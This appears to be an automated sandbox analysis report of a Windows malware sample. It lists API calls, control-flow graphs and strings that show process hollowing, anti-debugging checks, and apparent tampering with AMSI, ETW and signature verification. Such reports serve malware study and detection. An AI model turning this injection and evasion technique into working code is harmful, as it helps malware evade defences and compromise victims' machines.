2da85fe 38187->38188 38189 2da81cc 17 API calls 38188->38189 38190 2da8611 38189->38190 38191 2da8274 15 API calls 38190->38191 38192 2da8617 WinExec 38191->38192 38193 2da8639 38192->38193 38194 2d944dc 11 API calls 38193->38194 38195 2da8641 38194->38195 38195->37038 38196->37097 38197->37257 38198->37307 38199->37431 38200->37261 38201->37351 38203 2da89bb 38202->38203 38204 2da8973 GetProcAddress 38202->38204 38203->37554 38205 2da898d 38204->38205 38206 2da89b0 FreeLibrary 38204->38206 38207 2da7d78 18 API calls 38205->38207 38206->38203 38208 2da89a5 38207->38208 38208->38206 38209->37747 38210->37747 38212 2d949a4 GetFileAttributesA 38211->38212 38212->37756 38214 2d94f3c 38213->38214 38215 2d94f26 SysAllocStringLen 38213->38215 38214->37765 38215->38214 38216 2d94c30 38215->38216 38216->38213 38217->37768 38219 2d94c74 38218->38219 38220 2d94c66 SysFreeString 38218->38220 38219->37775 38220->38219 38222 2d94530 11 API calls 38221->38222 38223 2da87ab 38222->38223 38224 2d94860 11 API calls 38223->38224 38225 2da87ca 38224->38225 38226 2da81cc 17 API calls 38225->38226 38227 2da87dd 38226->38227 38228 2da8274 15 API calls 38227->38228 38229 2da87e3 CreateProcessAsUserW 38228->38229 38230 2da8827 38229->38230 38231 2d944dc 11 API calls 38230->38231 38232 2da882f 38231->38232 38232->37868 38232->37870 38234 2d94530 11 API calls 38233->38234 38235 2da8425 38234->38235 38236 2da798c 12 API calls 38235->38236 38237 2da8432 38236->38237 38238 2d947ec 11 API calls 38237->38238 38239 2da843f 38238->38239 38240 2da81cc 17 API calls 38239->38240 38241 2da8452 38240->38241 38242 2da8274 15 API calls 38241->38242 38243 2da8458 NtReadVirtualMemory 38242->38243 38244 2da8486 38243->38244 38245 2d94500 11 API calls 38244->38245 38246 2da8493 38245->38246 38246->37947 38246->37948 38248 2d94530 11 API calls 38247->38248 38249 2da8695 38248->38249 38250 2da798c 12 API calls 38249->38250 38251 2da86a2 38250->38251 38252 2d947ec 11 API calls 38251->38252 38253 2da86af 38252->38253 38254 2da81cc 17 API calls 38253->38254 38255 2da86c2 38254->38255 38256 2da8274 15 API calls 38255->38256 38257 2da86c8 NtUnmapViewOfSection 38256->38257 38258 2da86e8 38257->38258 38259 2d94500 11 API calls 38258->38259 38260 2da86f5 38259->38260 38260->37988 38260->37989 38262 2d94530 11 API calls 38261->38262 38263 2da7a51 38262->38263 38264 2da798c 12 API calls 38263->38264 38265 2da7a5e 38264->38265 38266 2d947ec 11 API calls 38265->38266 38267 2da7a6b 38266->38267 38268 2da81cc 17 API calls 38267->38268 38269 2da7a7e 38268->38269 38270 2da8274 15 API calls 38269->38270 38271 2da7a84 NtAllocateVirtualMemory 38270->38271 38272 2da7ab5 38271->38272 38273 2d94500 11 API calls 38272->38273 38274 2da7ac2 38273->38274 38274->37960 38276 2d92c10 11 API calls 38275->38276 38277 2da8cb6 38276->38277 38277->38031
                                                                                                                    APIs
                                                                                                                    • InetIsOffline.URL(00000000,00000000,02DBB784,?,?,?,00000000,00000000), ref: 02DAF801
                                                                                                                      • Part of subcall function 02DA89D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA
                                                                                                                      • Part of subcall function 02DAF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02DAFAEB,UacInitialize,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,Initialize), ref: 02DAF6EE
                                                                                                                      • Part of subcall function 02DAF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DAF700
                                                                                                                      • Part of subcall function 02DAF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02DAF754
                                                                                                                      • Part of subcall function 02DAF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DAF766
                                                                                                                      • Part of subcall function 02DAF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DAF77D
                                                                                                                      • Part of subcall function 02D97E5C: GetFileAttributesA.KERNEL32(00000000,?,02DB041F,ScanString,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,UacInitialize), ref: 02D97E67
                                                                                                                      • Part of subcall function 02D9C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02F0B8B8,?,02DB0751,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,OpenSession), ref: 02D9C37B
                                                                                                                      • Part of subcall function 02DADD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DADE40), ref: 02DADDAB
                                                                                                                      • Part of subcall function 02DADD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DADE40), ref: 02DADDDB
                                                                                                                      • Part of subcall function 02DADD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DADDF0
                                                                                                                      • Part of subcall function 02DADD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DADE1C
                                                                                                                      • Part of subcall function 02DADD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DADE25
                                                                                                                      • Part of subcall function 02D97E80: GetFileAttributesA.KERNEL32(00000000,?,02DB356F,ScanString,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,Initialize), ref: 02D97E8B
                                                                                                                      • Part of subcall function 02D98048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02DB370D,OpenSession,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,Initialize,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8), ref: 02D98055
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                    • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                    • API String ID: 297057983-2644593349
                                                                                                                    • Opcode ID: c12f30f7a05a0dab58843bb28ea6c068340edd7136bc0f307fae60a0b677129c
                                                                                                                    • Instruction ID: 46ebcfb3cb78d577dc9a454c733002b8161ba46feaf0232e34f881b60161f506
                                                                                                                    • Opcode Fuzzy Hash: c12f30f7a05a0dab58843bb28ea6c068340edd7136bc0f307fae60a0b677129c
                                                                                                                    • Instruction Fuzzy Hash: 03141C75A4015CDFDF21EB64DC90ACE73BAFF89304F5041E6A409AB715DA30AE868F61

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 6027 2da8d70-2da8d73 6028 2da8d78-2da8d7d 6027->6028 6028->6028 6029 2da8d7f-2da8e66 call 2d94990 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 6028->6029 6060 2da8e6c-2da8f47 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 6029->6060 6061 2daa8b7-2daa921 call 2d94500 * 2 call 2d94c60 call 2d94500 call 2d944dc call 2d94500 * 2 6029->6061 6060->6061 6105 2da8f4d-2da9275 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d930d4 * 2 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94de0 call 2d94df0 call 2da8788 6060->6105 6214 2da92e8-2da9609 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d92ee0 call 2d92f08 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 GetThreadContext 6105->6214 6215 2da9277-2da92e3 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 6105->6215 6214->6061 6323 2da960f-2da9872 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da8400 6214->6323 6215->6214 6396 2da9878-2da99e1 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da8670 6323->6396 6397 2da9b7f-2da9beb call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 6323->6397 6486 2da9a0b-2da9a77 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 6396->6486 6487 2da99e3-2da9a09 call 2da7a2c 6396->6487 6425 2da9bf0-2da9d70 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da7a2c 6397->6425 6425->6061 6528 2da9d76-2da9e6f call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da8c80 6425->6528 6496 2da9a7c-2da9b73 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da7a2c 6486->6496 6487->6496 6566 2da9b78-2da9b7d 6496->6566 6579 2da9ec3-2daa61b call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da7d78 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da7d78 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 SetThreadContext NtResumeThread call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d92c2c call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da894c * 3 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 6528->6579 6580 2da9e71-2da9ebe call 2da8b78 call 2da8b6c 6528->6580 6566->6425 6805 2daa620-2daa8b2 call 2da894c * 2 call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c * 5 call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2da8080 call 2da894c * 2 6579->6805 6580->6579 6805->6061
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA89D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA
                                                                                                                      • Part of subcall function 02DA8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DA8814
                                                                                                                    • GetThreadContext.KERNEL32(000008A0,02E17424,ScanString,02E173A8,02DAA93C,UacInitialize,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,UacInitialize,02E173A8), ref: 02DA9602
                                                                                                                      • Part of subcall function 02DA8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA8471
                                                                                                                      • Part of subcall function 02DA8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DA86D5
                                                                                                                      • Part of subcall function 02DA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DA7A9F
                                                                                                                      • Part of subcall function 02DA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA7DEC
                                                                                                                    • SetThreadContext.KERNEL32(000008A0,02E17424,ScanBuffer,02E173A8,02DAA93C,ScanString,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,0000089C,002F8FF8,02E174FC,00000004,02E17500), ref: 02DAA317
                                                                                                                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008A0,00000000,000008A0,02E17424,ScanBuffer,02E173A8,02DAA93C,ScanString,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,0000089C,002F8FF8,02E174FC), ref: 02DAA324
                                                                                                                      • Part of subcall function 02DA894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,UacScan), ref: 02DA8960
                                                                                                                      • Part of subcall function 02DA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DA897A
                                                                                                                      • Part of subcall function 02DA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize), ref: 02DA89B6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                    • API String ID: 2388221946-51457883
                                                                                                                    • Opcode ID: b772b31b8b199b9ee2eb7915f135e65565940b8e6a5a7e849dd0432a05769286
                                                                                                                    • Instruction ID: af2826df9fa8a8d7c1ea817e88f096ee8f6419e68469a01a32018335627c91fb
                                                                                                                    • Opcode Fuzzy Hash: b772b31b8b199b9ee2eb7915f135e65565940b8e6a5a7e849dd0432a05769286
                                                                                                                    • Instruction Fuzzy Hash: 67E2EA75A401589FDF11EB64DC90ECFB3BAFF85700F9042A5A409AB315DA30AE86DF61

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 6883 2da8d6e-2da8d73 6885 2da8d78-2da8d7d 6883->6885 6885->6885 6886 2da8d7f-2da8e66 call 2d94990 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 6885->6886 6917 2da8e6c-2da8f47 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 6886->6917 6918 2daa8b7-2daa921 call 2d94500 * 2 call 2d94c60 call 2d94500 call 2d944dc call 2d94500 * 2 6886->6918 6917->6918 6962 2da8f4d-2da9275 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d930d4 * 2 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94de0 call 2d94df0 call 2da8788 6917->6962 7071 2da92e8-2da9609 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d92ee0 call 2d92f08 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 GetThreadContext 6962->7071 7072 2da9277-2da92e3 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 6962->7072 7071->6918 7180 2da960f-2da9872 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da8400 7071->7180 7072->7071 7253 2da9878-2da99e1 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da8670 7180->7253 7254 2da9b7f-2da9beb call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 7180->7254 7343 2da9a0b-2da9a77 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 7253->7343 7344 2da99e3-2da9a09 call 2da7a2c 7253->7344 7282 2da9bf0-2da9d70 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da7a2c 7254->7282 7282->6918 7385 2da9d76-2da9e6f call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da8c80 7282->7385 7353 2da9a7c-2da9b7d call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da7a2c 7343->7353 7344->7353 7353->7282 7436 2da9ec3-2daa8b2 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da7d78 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da7d78 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 SetThreadContext NtResumeThread call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d92c2c call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da894c * 3 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da894c * 2 call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c * 5 call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2da8080 call 2da894c * 2 7385->7436 7437 2da9e71-2da9ebe call 2da8b78 call 2da8b6c 7385->7437 7436->6918 7437->7436
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA89D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA
